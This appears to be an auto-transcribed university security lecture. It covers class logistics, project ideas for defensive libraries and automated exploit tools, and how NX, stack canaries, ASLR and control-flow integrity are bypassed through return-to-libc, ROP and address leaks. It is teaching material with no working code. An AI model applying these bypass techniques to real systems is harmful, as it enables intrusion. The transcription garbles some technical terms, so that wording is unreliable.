 Good morning, everyone. Thanks for being here today. Any, so, okay, let's go. Okay, so submit your assignment for write-ups. So you can submit your write-up now and then the reduction, what is it, 20% reduction per day applies. So that will only apply on the levels that you break from yesterday to today. So if you break two levels and you would have gotten 20 points, you'd get two things, right? I hate doing math in front of all of you. Right, so you don't, you can just submit an additional write-up of those levels that you broke. That would be totally fine. Questions, comments, thoughts on the assignment? No, not right now, we gotta wait. Let's give it like three days for four days for all the reductions to fit in. So yeah, we're happy to discuss. I'll also leave that server up so you guys can play with it, access it, work on the levels, all that kind of stuff. If you wrote any source code, submit it. Deleted them? How are you ever gonna solve this problem again? So just mention it in your report. But I think I set it up so you have to submit something so just submit something. Is it okay to leave all the source files in my home directory and just write about them in the source? No, try to attach them since they're separate systems because I don't want to have to copy everybody's, because some people have like, I don't know, libc source files, everything in there, all directory size. Yeah, you can use our sake to copy from a local folder to your source so you can get a follow-up from there. Cool, anything else? Yeah. The solutions, can I see in the solution? Do you have to be given? No. No, that's why you have another four weeks to keep working on things. Oh, what about before the exam? Because a lot of these problems relate to the classes that we have been taught and if we do not crack all the levels before the semester exam, would you give out the solutions then? No. You can also, if you find there's tons of intensionally vulnerable software online. So if you find stuff, you can email it to the class and say, hey, here's an example of integer overflow vulnerability, right? Here's a program and here's how to explain it. So yeah, definitely leverage all the information that's out there on other stuff. But yeah, we're going to produce these again so don't post your solutions online, all that kind of normal schoolwork stuff. Anything else? Cool, all right. Projects, so I posted some project ideas on the website. So there's two types of projects you can do. You can either choose to do a prevention security library or you can choose to create some kind of automated exploitation tool that will try to automatically exploit these types of vulnerabilities. So you can choose whichever you want. As mentioned previously, your group is either going to be one person or two people. So max two people in your group. I expect these to be done individually or in pairs so I know that you're actually doing stuff on carrying some person who's not doing anything, right? You've all been in groups like that after. Yes, I have a subtle lack there. OK, so some of the ideas. So I'm also open to new ideas. So if you have something new that you really want to try out, email me. I'll see. We'll work on it to try and see if we can make it because I have to get the right level of interesting enough but not impossible. And then I can put it on here so that other people can decide to do these projects. So these are some of my ideas, things that I think would be cool. So prevention. So generally in prevention, the things that I think are really interesting are any kind of security defenses that can be applied automatically. So that require almost no changes to the original source code. To me, that is super cool, really awesome defenses. If you have to say, well, if the programmer writes their code and uses my library, that can also be cool, right? But it then needs to be a little more technically interesting. This is a lot trickier to apply the legacy software. So one of the project ideas here is size aware overflow functions. So the idea is you want to prevent buffer overflow attacks by hooking malloc and hooking the traditional overflow functions to basically keep track of the size of all malloc pointers. And then when pointers are then passed to the traditional overflow functions, right, the ones that we talked about, then you extract that size from that information you're keeping and make sure they're not trying to copy more. So you can actually translate string copy to a string end copy to make sure that it only ever uses that amount of data. So you can use, if you want to do this kind of stuff, also probably add a little more details here. These were kind of my high level thoughts. But LD preload is a mechanism to say that a library should be used when a program is executed. I think actually some of you have emailed me about this, trying to use this to explain some of the examples. So this can be used to actually provide your own version of malloc and printf and some other functionality. So if you use this, this allows you to hook in and basically add protection mechanisms here. This is the way you can do this without requiring any modifications to the source code. This can be applied to any binary. And so yeah, so kind of some high level ideas of how to do this. I also, for most of the projects, I added a stretch goal. So when I was working at Microsoft, I always had our goals for the years and then our stretch goals of where we tried to go. So this would be like, if you do this, this will be like extra credit or something. We'll figure out something good. Yeah, so the idea is, so this you can easily do with malloc because when you malloc memory, right, we know the pointer that gets returned and we know the size that gets passed around malloc. So you should be able to do this and ensure that none of these overflow functions actually overflow one of these malloc-based pointers, right? But as you saw on the homework assignment, right? A lot of these buffers are actually stack-based buffers. And so the interesting thing here is how to stretch and implement this with stack-based buffers, right? Could you somehow try to automatically infer from these functions the size of the stack? Maybe you can inspect the code at runtime. I don't know, there's a lot of cool ways to take this to actually implement something like this. You could pre-compile or maybe you add a compilation step to change all the local buffers maybe to mallocs or something interesting can definitely be done here. So if you want to take it in this direction, feel free to do that. Okay, format strings. So format strings, so basically similar type of things. So you want to hook and provide basically hook the traditional print-out function and provide a safe version that filters out all of those vulnerabilities that we talked about. So the trick here is to remove all possible combinations of percent ends. So you'll actually have to study and understand the format string specification, right? Because if you just filter out percent ends, as we saw, there's all kinds of positional arguments and all kinds of modifiers, right? So that actually makes this a little bit more interesting than I was originally thinking about. The stretch goal would be to think of how to extend this to also prevent information leakage vulnerabilities, right? So this could actually be pretty cool to try to, when the print-out function is called, try to inspect the stack to see how many parameters were explicitly passed to that function, right? Versus, and then that way you could enforce maybe that constraint in the print-out function. So you wouldn't actually be able to access anything outside of that bound. That could be really cool. And, ow, maybe I'll, no, I like this. Okay, so yeah, so I think this one is one of the more simpler implementation-wise. So you need to also write three distinct programs that contain format string vulnerabilities along with reliable and repeatable exploits for them. So this helps you make sure you know about print-out vulnerabilities. Questions? You can feel free to stop me if you want. There you go, cool. Okay, we're gonna get into web stuff. Like hopefully it's Wednesday. So there's also stuff about cross-site scripting prevention. So provide some kind of security layer that prevents cross-site scripting vulnerabilities. You should try to do this in a way that requires minimal modifications to the PHP program. These, obviously, if you have experience in web or web vulnerabilities, this would be a good way for you to go, especially now when we're just getting into that content. Stretch would be to extend this project to prevent context-sensitive cross-site scripting vulnerabilities, which I'll add links here to what exact banding by context-sensitive. Similar thing with SQL injection vulnerabilities. So create some kind of layer or wrapper or something that basically instruments the attacker-supplied variables and checks that those are not used in a SQL query. Cool, also cool things. Prevent second-order SQL injection vulnerabilities. So those are kind of a high-level prevention mechanisms. To be completely honest, I wanted to add stuff in here about networks, but everything I thought of ended up back to just doing SSL, basically. So like prevent TCP hijacking, why we should use SSL, like TLS or something, right? So, but if you have some cool idea there, please talk to me about it. Okay, for exploits, right? Hopefully you kind of got this as you were going through the levels that actually a lot of this stuff can be automated to actually help you do this, right? So, automatic buffer overflow exploitation. So, basically figure out, design some kind of way to describe the vulnerability. Doesn't have to be a language in a traditional sense. It just has to be some way that, so basically, I find a vulnerability, I want to be able to tell your program, hey, this is how you trigger the vulnerability, just the binary, automatically exploit it. So, that's basically what this, you need to do is figure out the length, figure out what's gonna crash it, figure out the knob and the shell code and the offset and all that stuff and figure out the address, all of it automatically. The stretchable here would be work, many of these are just, make it work on a different architecture, right? So, work on 64-bit architecture. In a similar vein, automatic format string exploitation. So, this basically same thing, take a binary, have some way to describe which input is vulnerable and then automatically construct the format string that will exploit that vulnerability. So, you have to find out where that vulnerability is on the stack. So, how many of the positional argument you need, what the output of the string is, what are all the values that you need to send in there. Yeah, this one's gonna be really cool. I think you can definitely do this and it would help a lot. And so, extend the project to work on x86, 64-bit binaries. Okay, in the cross-site scripting world, oops. So, develop a tool that automatically generates a precise cross-site scripting payload. So, a lot of the cross-site scripting stuff uses this huge list of exploits and tries to send stuff to see if they're vulnerable. The problem here is that it goes back to context sensitivity so it depends on where in the HTML page that this output is used. So, what you should do is create a model of the browser's parsing engine, all the characters that transition the browser's parsing state. See where that output is used, figure out what the state of the JavaScript engine or the parsing engine is in at that point and then figure out what malicious characters you need to transition the browser to JavaScript. So, oftentimes it's like bracket script, right? But oftentimes there's actually more complicated or you actually don't even need brackets at some point. So, yeah, your tool should be able to generate the transition that actually does this. And the stretch goal here would be to integrate the tool with a crawler like an automated crawling system like W3AF as a model there. Blind SQL injection, so this is a tool that actually does exist. So, the idea is blind SQL injection, you actually don't get any output but you do get one bit of information which says if this exploit was successful or not. So, you can use this technique to automatically extract the entire database given this one bit of information. So, that's basically what this project is about. Yeah, and then propose your own projects. I guess I don't have a due date. I was thinking last day at class but we'll figure out a good due date and then you'll write up a two page report about the project, what it did, I did it. Maybe also do demos or something for me and or the TAs. So, we'll figure out that stuff as we get close but now you can start thinking about what project you want to do, if you want to try to do a new project, if you want to do the pairs or by yourselves. All that kind of stuff. So, questions? Yes? For exploitation tools like a format thing, is there a delivery method, no, it's foreign because some of the program, a program makes format symmetry files of the tool that you manage. Is the delivery method assumed or? I think you should know. The program doesn't have to figure it out but you have to have a way to tell your program what it is, right? And it doesn't have to cover every single possible case but it should cover the cases we talked about, right? Arguments, input, maybe, those kind of things. It doesn't need to be crazy complex, like you don't have a language that describes, you send this and then they send you this and then you expect this and then you send the format, right? But it should have like, here's the input, here's, and then here's how I look for the result, right? That's another one, is how do you know the result of that format? Are there already available, I released for all the ones that you talked about? I don't think so. The only one, the blind SQL injection, that tool does already exist but I do think it's super cool and I think it would be fun to do. I don't, this definitely does not exist. It's something that I definitely know can exist and would be really cool. I don't think, I don't think either, so there are, there is a research paper was kind of where I got some of these ideas. David Brumley's group at CMU has a paper on automatic exploit generation. So they, but they're doing complicated, like static analysis, they build up a whole SMT formula based on how to get there and then it can automatically generate input that triggers a vulnerability but you don't have to go that far. I mean, if you want to, that'd be super cool if you want to do the static analysis stuff. I think that'd be cool. Questions? Is this already up or not? Yes. This should be a projects tab, I think. You may have to refresh. What do we need to have a project idea by? I would say end of this week, Friday. That way you have your idea and group all set so you can crank for three weeks and do some cool. Cool. All right. Let's get done with binaries. We talked about all different types of vulnerabilities, right? And so remember, we talked about classifying all of these kind of application level as really the core problem is memory corruption, right? It's that some other process is able to trick us into overriding or changing some value in memory that the programmer shouldn't be able to access, right? So what would be the best if we live in an ideal world, how would you prevent all these vulnerabilities? By coding together? Yeah. Right? Good for these programs, right? Unfortunately, I've been talking about this class, right? This is more or less impossible, right? I mean, we'd love for this to be the case. One way would be to use a different language, right? Use a language like Java or Python that actually does boundary checking. And so it more or less eliminates these kinds of arbitrary memory writes. But what's the problem here? Performance could be one. What's interpreting your Java or your Python programs? C, right? The interpreter is written in C or C++. And this is why there's still, so JavaScript is, does boundary checking itself, right? But it's running on a C engine and C interpreter, and there's problems in there. And so that's how they exploit memory corruption vulnerabilities through that. You could try to analyze the program, right? Try to analyze the program, find all the vulnerabilities, tell the programmer before they execute it, right? What's the problem here? A little bit to enter in there. Yeah, so actually part of the problem is that precisely identifying every single vulnerability in a program, right, and getting nothing wrong is equivalent to deciding if the program halts or not. So it's equivalent to the halting problem. So we can't solve the halting problem, which means we can't statically identify every single vulnerability in the code, right? This is actually one of those things that is, I can develop a tool that will find every buffer overflow vulnerability in your tool, in your program, right? Every single line of the code, I say, yep, there's a buffer overflow there, there's a buffer overflow there, there's a buffer overflow there. So I'll find them all, right? But I'm also gonna give you some false positives and I'm gonna say things are vulnerable when they're not. So that's the problem there. The other thing, technique is to make exploitation harder, right, make an adversary jump through more hoops in order to exploit the vulnerability, right? So is this useful from a security perspective? Discourages people from trying to get past your security mechanisms? Is it worth their time? Mm, yes. So that's kind of the, goes back to the old joke, you and your friend are running from a bear in the woods and do you have to outrun the bear? No. No, you only need to outrun your friend, right? And then you're fine. So it's kind of a similar thing in our security sense, right? I don't need to be super secure. I actually need to be a little bit more secure where the attacker's gonna attack somebody else rather than me, right? Yeah. Well, other than you might have a thing of honey on you when your friend may not, so. Yeah, exactly. That's a good point, right? So I may be a more attractive target to bear terms, right? Covered in honey. Also it's probably hard to run when you're covered in honey, I don't know. But yeah, right? So still dedicated adversaries, right? They still become a problem, right? And so the other thing to think about is cost, right? How much does it cost an attacker to develop a reliable exploit for this type of vulnerability? If I can make it more expensive for them, then yes, okay, I'm not gonna keep out the nation-state level attackers, right? But I can keep out the random hacker group, right? Like anonymous or whoever who's just trying to do things for the lulls and trying to find things that way. We can also try detecting this, right? So we can try detecting exploits, blocking them. So we can kind of, what you're gonna be doing is doing some kind of dynamic analysis checks, right? So do some kind of checks to see if something's being overflowed if you're trying to copy more than should be. Some of the things that have been done is trying to analyze system calls. So see what system calls the application makes and then if it deviates significantly, stop it and say that there was an attack, right? We talked about detection, right? We do, detection is good, right? We need to know if our systems are compromised but oftentimes it's often done after the fact which then how useful, you know, you do wanna know that you've been infected but it didn't really stop anything. You could detect, you could look at what the code's doing. You could see if it writes code and then jumps and starts executing those code, right? So you could try to develop in some sense some kind of exploit fingerprint like the shell code we were using to like push things on the stack and then jump to things on the stack. You could do some kind of integrity checking to try to check return addresses at runtime to make sure return addresses aren't tampered with. So there's been a lot of research we're gonna look specifically at making exploitation harder, right? So do you think that your job was easy with these exploits that you're writing and developing for Simon 3? No. No, it's hard, right? These things make it even harder, right? We can see that still whenever there's incentive to bypass these things or get around these things, bad guys will find a way, right? And so it's just really this continuous arms race where we develop a new kind of mechanism to make exploitation more difficult and then the attackers go one step further and they find ways around that, they find a more reliable way to do it. So then we figure out what they're doing on that one and then we make something new defense, right? And so we constantly have this trade off. So we're gonna leave this kind of as a, in a historical way of how things evolve. So the first thing they said was, well, whoever wants to execute code on the stack, right? We should never execute code on the stack. So in Linux, there's an NX bit on memory, which is the non-execute bit. So basically, so it's pretty much standard on all systems now. So basically it marks a memory area as non-executable, right? So it's actually one of the flags that we use when we compile your applications for assignment three is we say, okay, mark the stack as non-executable, right? So DEP, so Microsoft also has implementations of this, right? Microsoft is very interested in making exploits more difficult and trying to protect people. So it actually will support it, which is great, the WXORX, right? So you can either write or you can execute to a memory, you can't do both, is in the BSD of BDS. And so we think, okay, well, problem solved, right? The attacker can't execute anything on the stack, but is that the story over? Are we still talking about this? Could someone in the environment variable, I'd say the environment variable is on the stack, right? So that's still on the stack, which makes sense, right? You wouldn't want to execute something in the environment, yeah. There are other locations that data section. Yeah, so data section, right? So what about the heap, right? All we need to do is get to that address, right? Our shell code can literally live anywhere in the program, or if it's like a user's string or something like that, right? The basic idea of the NX bit is that you never want to have memory be both writable and executable at the same time, right? That's where a problem goes, because an attacker can write and then they can start executing from it. So one thing, what? Does this describe, I mean, maybe most programs we write, what about like Java or JavaScript, like a JavaScript engine? Would that work here? Why not? What's the feature of those interpreters that make it so that this doesn't, I didn't have a code generation, what's another name for that? Eval Java. Eval is one, JIT, right? Jitting code, right? So just in time compilation of code means runtime compiling it from Java byte code to X86 code, right? So you have to write that code somewhere, and then you have to change that once writable segment now to be executed and to jump to it and execute that as code, right? So I can easily get around this non-executable memory in a language like that. And oftentimes this is exactly what happens in JavaScript, is essentially what the attacker will do will they will write JavaScript code that when it gets jitted compiles to valid X86 shell code and they try to use an exploit to jump to that shell code which is actually part of the JavaScript execution so that memory is executable, should be executable because the expectation is literally writing memory bits, bytes to it and then executing it. So you think about constants in JavaScript. They're gonna be compiled into constants there and because X86 is very reliant, if you jump to the middle of an instruction it could be something completely different. There also is another way, so this is what, so there's a type of exploitation technique that originally started as return into libc and it's related to the control of the EVP that we talked about in here. So the idea is if we control EVP, right? Or even if we control the stack, right? So the stack has the function frames of every function that's being called up until that point, right? So we saw the frame, we know it contained the arguments, the save evp, the save evp and the local variables, right? And then we saw that when our function returns they use that save evp value. So normally we use our shell code address, right? To jump to. The idea here is instead of jumping to my shell code the things that I wanna happen are already libc functions often, right? So there's the system call, right? So what if we, so we completely control this call stack now. So what if we change this call stack to make the program think that it came from a libc function and all the arguments to that function also live on the stack so we can then change the stack to look like it just got called from there. And so it will jump and start executing a function that already exists. So we're taking advantage of code that's already there written and loaded by the application. So that's kind of the general idea of these techniques is we're gonna create a fake call frame that looks like it came from some trusted function. And so control flow will go, we'll change save evp to then point to there not to our shell code, but it will still accomplish the same goals that we want. So any function that's currently linked used by the application we can use this technique to. So we can get it to call any function we want. So often if system is used, right? So system takes in one character pointer argument that is the string to be executed. This is just like if you type this into bash. So we can get the function to then go back and return into system. Then now we've actually controlled the code very well. We can even do tricks like we can do string copy to copy shell code wherever we want. So from the stack to somewhere that's actually executable, we can also do that. All we have to do is we have to find the system function in memory. And to do this we've seen we can use debuggers, we can try to use the proc file mappings. But we can figure out where this system call is actually being loaded at runtime. So to see kind of how this works, right? So we have our buffer, we have save dbp, save pip. And we first wanna call, so it's gonna string copy our input into buffer, right? So we're essentially creating now a new call frame. And before the only thing we cared on that new call frame was just save pip, right? That was the only thing we cared about. But now I want this function to go and call system, right? And this is gonna call system if save dip is overwritten with the address of system. And then above that is going to be the fake caller return address. We have to pretend like we called system from some other function. I believe there should also be a fake evp on here which is not on here. And then the address of slash bin sh zero, right? So we already kind of know how to use this. We can use, well, if we can get this string somewhere into this function, right? It's not too hard. It can be somewhere here in our buffer. As long as that string is there, we provide the address of that string. Now when system executes, it's gonna look up the stack, see which is the argument to system. It's these bin sh and it's gonna execute bin sh for us. So the idea is when we call return, right? Our stack pointer's gonna be here. And that way we've created a new frame with a new save dip, new save dvp and arguments to system. And our system starts executing as if it was called. Right? And we can execute system. What's gonna stop us from calling a function that already exists in the program? Right? Nothing. Why do you need a big evp? Would it just like a big evp? You need both. You need both two space there. Because it's gonna look for the argument at, it's gonna create a new evp, which is gonna be where the stack pointer is, and then it's gonna look up eight for the first argument there. And so the crazy thing is, right? Once system executes, right? It's gonna do whatever we call and then when it returns, it's gonna return to wherever this return address is, right here, which we can control. So we can actually use this technique to chain multiple functions together. We can create this beautiful call stack of all of these functions of who's calling what. And when they'll return, they'll just call one after the other. So they'll call. And this is how we can do all kinds of crazy stuff with, like, we can do the string copy so we can first put call set UID because sometimes if the program is dropping privileges or trying to save its UID, right? It's trying to save the effective user ID. We have to wanna put it back by calling set UID. So we wanna call that, then we wanna call system. And so we can chain these together. When the original function returns, it's gonna call system. And then when system returns, it's gonna call back into set, oh no, sorry. Yeah, when the original function returns, it's gonna call set UID. And then when set UID returns, it's gonna call system. So in this way, we can chain these functions together. And then we can even try to, so we string copy here, right? So we're gonna string, yeah. So when you return system, you cannot directly call a set UID, right? When you want, say that again. When you return to system, you cannot use system or set UID. No, system will only execute things like in batch, right? So I think it will do a fork and then an exec and then do whatever it's gonna do. I'm trying to do that for the way it's gonna do it. Yeah, so you need to, well, I believe system may also drop privileges. Yeah, I think so. If the set UID is not the same as the effective user ID. So yeah, you need to do this first is, it's a combination, I forget exactly how it's done, but basically like set UID equal to the effective user ID. So if you do those and then do system, that should work fine. So we can even copy the shell code. We can get this to copy our shell code to an executable place and then execute it. So we can copy, so this first string copy is gonna copy our buffer and our new frame onto the stack. Then when this original function returns, it's then going to string copy, it's gonna copy the address of our shell code into wherever some place that is executable. And then when string copy returns, we can have it return into this executable area that it just created. So in this way, we can actually get the program to copy our shell code from someplace that's not executable to someplace that is executable. We can also write all the memory mappings of what's writable or executable the program controls. So we could even call those functions to change the stack to be executable and jump onto the stack. But we have to be a bit more precise when we're doing this. So you can see that yes, the job of the attacker does get more difficult. And what we're doing here is we're actually jumping to the start of each of these functions because we want that entire behavior of these functions. But this behavior can actually be generalized to execute arbitrary functions. Yeah, so basically we can do, so we can see we can do, so actually this, so we saw we can chain it and we can do this arbitrarily many. So we can, yes, okay. So the idea is we can execute arbitrary sequences of functions, right? So we've seen move EVP into the stack pointer, pop EVP, ret, right? We know these are the function epilogs and we know that we can use these, or we know that what these do is it sets the stack pointer to the current base pointer. It pops the current value that's on the stack into the base pointer and then it returns based on that other value that's on the stack right above that saved base pointer and starts executing there. So what we can do is take advantage of these little chunks of code, right? These little chunks of code change the stack, also move things and then return. So if they have some other side effect, we can try to create a number of fake function frames that point to bits of code like this that do these little things, right? So let's say, I don't know. The thing that was before this was add one into EAX, right? So if I call into there, I know I'll increment EAX and then I'll start executing at whatever the function frame is above that. And let's say there's another one that will X or EAX with EAX and there's another one that will move EAX into EVX. So now I'm building up essentially a language of little tiny gadgets that do like one little thing and by combining these together in an arbitrary number, I can perform arbitrary computations and in effect use whatever my shell code would do, I can make the program do that. So the basic idea is you put all of this here so you're exactly the point I wanted to make. This is actually just doing epilogues to... Yeah, this is, oh, this, okay, I see, I see. This is using the epilogue to change the base pointers and the stack pointers. So to change where the function frame is. Yeah, this isn't too important. What I was talking about, what I was talking about was return oriented programming. So this is when you generalize this completely by using snippets of code. So just a little thing followed by a return instruction. And this was actually one of those things. So return to libc had been around for a while. People kind of knew intellectually that this was a problem. But it really wasn't until, well, attackers or actually don't know if the academics came first but the idea, this was a technique that was used to build up arbitrary functions. That's right, this is the paper. So the geometry of innocent flesh on the bone. So the idea is there's still, we're reusing the stuff that's left there on the bone of the x86 code. And the idea here is that a large enough x86 executable code, right? So the beautiful thing about the code of the application is the code of the application is fixed and never changes the address of the code. And that code is executable, right? So the address doesn't change and it's executable which gets around all of our requirements. We just need to build up enough stuff for it to do. Okay, let's go here. Yeah. So the idea is you use these little gadgets and you're able to see this as well. I'm gonna do this to work. The idea is, yeah, so you put the addresses in here. So you first go into here and this will pop ECX, pop EAX and return. So you can get values into ECX and into EAX, right? And then if we go execute y, it will dereference ECX and move that into EAX and then return. So we've essentially been able to copy this value into this destination address. So just by using this incredibly simple gadget, we've been able to write to a memory location. And so you can build this up to do more and more complicated, interesting things. So our return into programming is how almost all of the new exploits work on Windows and all those kinds of things because they're incredibly reliable and they get around all of these defense mechanisms. So, okay, so that was one idea is like, okay, it looks like the stack not executable, right? Let's make memory not executable. Another idea is, hey, part of the problem is they're overwriting the return address, right? So let's prevent that. We don't want them to overwrite the return address. So then they added what are called canaries. So one of the original papers on this was a paper at Usenek security in next time you ate called StackGuard. So the idea is that you put a canary value after the saved. So you have saved EIP and then canary value and then save base pointer. And then that way you can check. So there's different types of canaries you can do. So you can put special values on there. You can put a random canary. So every time it program executes that canary is random. You can XOR some random value with the return address and then before you return, you check, you do that XOR again. And the key point in here is that you need to check before you actually do the return instruction. So you check to make sure that, so every now and why it's called a canary, right? So in like coal, it must be true. I don't know if they still do it, but in like miners when they, so apparently like canaries respiratory systems are very sensitive to like particles and that kind of thing. So when people are like mining or doing something kind of dangerous where there might be particles and that kind of problem, they'll bring a canary down there with them. And so if the burb dies, that means there's a problem in meaning to leave. Yeah, it is kind of terrible, but these are digital canaries. So no canaries were hurt in the making of this sacrifice. And so the downside here is you need to recompile the program in order to add these canaries in there. And this can introduce obviously some overhead, right? Every function returned, you have to do this check. Maybe every function call, you have to set up this unique canary, right? So all these kinds of overheads. So we saw it. So if you've tried to just compile some of these examples and do these simple buffer overflows, you'll see the stack smashing protection, the stack canary. So this is why that we do the fStackProtectorNo or fNoStackProtector. Yeah, and also what they'll do is they'll try to rearrange the memory of the function such that it's less likely that the program is executable, right? As we saw, if your buffer overflows local variables, you can control those local variables. So what they'll do is they'll change the way they compile the program such that the buffers are toward the top and the local variables are on the bottom and there's a canary between those and the after the buffer, but before the saved values. So yeah, so this actually was a huge problem on I think level 13 where I had to rewrite it so that we get around this and do exactly what we wanted it to do. Yeah, and so there's all kinds of how to protect stack smashing attacks. Unfortunately, these can be bypassed, right? So one of the ways is you try to break the canary or, yeah, or if you can overwrite and you control the address of where to overwrite, instead of overflowing the buffer, just overflow those four bytes of that return address. If you can figure out kind of where the address of the buffer is, you know it's the address of the buffer plus the size of the buffer to EVP plus another four and then you can just overwrite directly that memory address, right? So this is another instance where we have the defense mechanism that only kind of captures or prevents a very small segment of vulnerabilities. So you can overwrite pointers in the function frame. You can do all kinds of stuff, you know, it's a good, it helps prevent kind of garden variety basic stack overflows, but it still doesn't fix all kinds of vulnerabilities. Also, if you have a long running process, if you're able to guess the canary, right? If it's just a 32 bit value, maybe at some time you'll get it, maybe you can leak memory, you can use two more, two exploits, sorry, two vulnerabilities, leak some memory to leak the canary and then do the exploit. Other steps, right? So maybe you kind of got the impression, hopefully, part of this, that guessing addresses is hard, right? You have to be very, very, very precise for these exploits to work, right? So the other idea is, hey, let's make this part harder, make guessing harder. So how do we make guessing things harder? Randomize it. Randomize it, yeah, exactly. Just like we saw at TCP, right? So the next one is address space layout randomization. The idea is, okay, every time the program runs, let's change where the heap, the stack, the code, and the dynamically linked libraries are, right, what their addresses are. Unfortunately, it's not as easy to do as you might think. So stacking heap are easy because nobody, the addresses of the stack and the heap are supposed to change every time the program is on, right? But things like the program's code, that thing is fixed. If you looked at a bunch of object dumps of functions, right, they don't jump to labels, they jump to memory addresses, right? And the same thing with dynamically linked libraries, right, so that's why we have the global offset table that says where to go and where to jump to. So yeah, so this is actually really difficult. The libraries have to be rewritten to be positioned independent. Oh, you have to rewrite a lot of features here. And this makes return to little C attacks a lot harder, which is good. And so for 32-bit systems, actually, right, because you still do need, you can't just randomize something so that the stack and heap are right next to each other, right? Because they'll overflow. So there's actually not a lot of entropy in these ASLR systems on 32-bits. So yeah, you could try 32,000 attempts pretty quickly, right? Then break that, especially on a server that's running continuously, right? So you only need to get that right once to exploit it. 64-bit architectures make this much more difficult. Unfortunately, like I mentioned, rewriting the program's code is a lot more difficult. So rock or return-oriented programming techniques are still very effective. In addition, ASLR, right, oftentimes if you're just moving things down, right, even if you move the code somewhere, usually if I can use one information disclosure vulnerability to find out some bytes of the program, I can easily calculate the offset of where it was and then change my exploit to match that offset. So yes, it makes things more difficult, but then now attackers just change vulnerabilities together. So ASLR is enabled on Linux, except on our server where it's disabled. Yeah, so the curl does this with the L-floater. It does stack ASLR. It doesn't do libraries. I think it does libraries. There's all kinds of different types of ASLR you can look up that does something you're interested in. You can still do this. Well, we can disable it. There's actually this. If you don't want to disable it for the entire program, you can run a bash instance with ASLR disabled so that you can test these things out. As we've seen many types of randomization, if we can guess or just brute force, then we're good, right? And as we saw, right, if we can make the knob slide as big as we want, doesn't really matter. Like we can make it very, very, very, very large, right? So even if you randomize it, if you're trying to hit a large target that's slightly moved, it's not gonna take that much to hit it. So yeah, you either have to leak, basically leak the address or hijack the control flow, basically. So use some kind of Rop attack that's reusing code that's already there. Okay, the other technique is to, people say, okay, the basic problem when you boil all of these attacks down is that, the program has some control flow, right? This function should call this function, which should call this function, and then it should return back up that, right? So this is the control flow of the program. You can statically look at a program and understand the control flow. And so why don't we enforce that at runtime and say that only a function can only call functions that it knows about and it can only return to functions that should have called it, right? Function point is? Kind of with function point. I mean, you can statically analyze it and you can see, okay, function A calls B and B is only called from A or C. That means when that returns, it better only go to A or C, otherwise I know there's some type of vulnerability, right? And you could do this for every return statement in your program, automatically enforce this. So this was a paper at CCS 2015. And so, yeah, you basically try to figure out all the control flow of the program and you enforce this at runtime. The problem is that there was just recently a paper at Using Security called Control Flow Bending that said in a large application, right, you have functions that are called from multiple other different functions, right? So this type of thing is kind of precise. So imprecise for checks. Okay, when the function is called, it can only return to some place that I've seen it statically that it could be called from, but it doesn't check that that's actually who called it in this instance. So they showed that on a large program, there's actually enough variation to this control flow graph that you can execute arbitrary computations, reusing what already exists in the graph. So it's not the panacea that we kind of hope for. And the problem is this is, all these techniques assume a very strong attacker who can read or write, or they can write any memory address, right? So once you do that, you kind of, it's game over. All right, we're in the end game here. So just to go over some tools perspective. So you've been writing shell code, which is awesome. Hopefully maybe you found some tools or some other cool things. Metasploit is a whole framework and tool set that supports exploitation, remote code execution. It has some cool things like you can have different types of shell code and you can tell it what characters are not allowed. So you can do some polymorphic shell code. It has a free version you can download, you can run it, you can test it out. Scott also has, I believe, actual reliable exploits for different CVE vulnerabilities. Do not run these or test these on real systems, right? This is your daily ethical reminder to not do that. If you want to kind of get into this more, Collie Linux is a Linux distribution that has basically a bunch of security tools on it, already pre-installed, so you don't need to find them installed on yourself. Kind of fun to play around with. And so basically, as we've seen, right, you find a vulnerability, choose a payload, figure out how to encode that payload into the program and try to exploit that program. So anyway, so we've seen all the different ways that applications can be exploited, right? This class should make you incredibly paranoid, right? As software developers, don't trust anything. RGV, don't trust it. RGV0, don't trust it. Input from the user, don't trust it. Input from the network, don't trust it, right? All this can be controlled by an attacker, right? And so you need to code very defensively as you're doing this. So we can saw that unexpected inputs. We saw that the environment, right? Path variables can completely change the execution of the program. The home environment variable. And it's oftentimes not explicit in the application that it's using these variables, right? It's often relying on a library function which is using those environment variables. And so really, you really have to think about, okay, how can I sanitize things? How can I make sure things are safe? And how can I understand these environment dependencies? So in my mind, I see everything hopefully moving towards, I don't know if Rust is the answer or one of these other languages maybe go, probably not go, but right, some kind of language that provides memory safety also helps mitigate a lot of these vulnerabilities. But don't be lured into a false sense of security thinking I'm coding in Java. There can never be a security problem in my application, right? So not only are there other types of vulnerabilities that we'll talk about, web vulnerabilities that still exist in every language, but there's a tax on the logic of the application, right? So one of the classic examples is being able to, in an e-commerce application, being able to purchase an item for negative quantity, right? So I buy like two MacBooks and two negative MacBooks and like an adapter. And so then I paid $30 for four MacBooks, right? If it allowed me to do that, right? So, and this is the application is, there's no memory corruption or anything. The application's doing what it's supposed to be doing but the logic of that application is wrong. Right. Cool. All right. Here we got here, we'll start on web on Wednesday.